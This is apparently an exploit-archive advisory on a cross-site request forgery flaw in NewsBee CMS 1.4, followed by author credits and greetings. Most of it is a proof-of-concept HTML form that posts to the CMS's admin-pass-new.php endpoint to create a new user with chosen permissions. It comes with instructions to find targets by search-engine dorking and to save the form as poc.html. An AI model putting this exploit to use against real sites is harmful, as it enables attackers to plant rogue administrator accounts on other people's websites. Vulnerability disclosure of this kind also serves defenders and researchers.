NewsBee CMS 1.4 Cross Site Request Forgery

NewsBee CMS version 1.4 suffers from a cross site request forgery vulnerability.


MD5 | d36ac134802164e7be83e68a0a14edb0

====================================================================================================================================
| # Title : NewsBee CMS 1.4 CSRF Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 |
| # Dork : N/A |
====================================================================================================================================


poc :


[+] Dorking Adegn Google Or Other Search Enggine .

[+] save as poc.html .

<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>


<form action="http://codecanyon.nelliwinne.net/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">

<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">

<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">

<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC">&nbsp;</td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>


<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>

</tbody></table>



<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">

<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>

<br>


</div>
</div>



</div>
</div>



Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================

Related Posts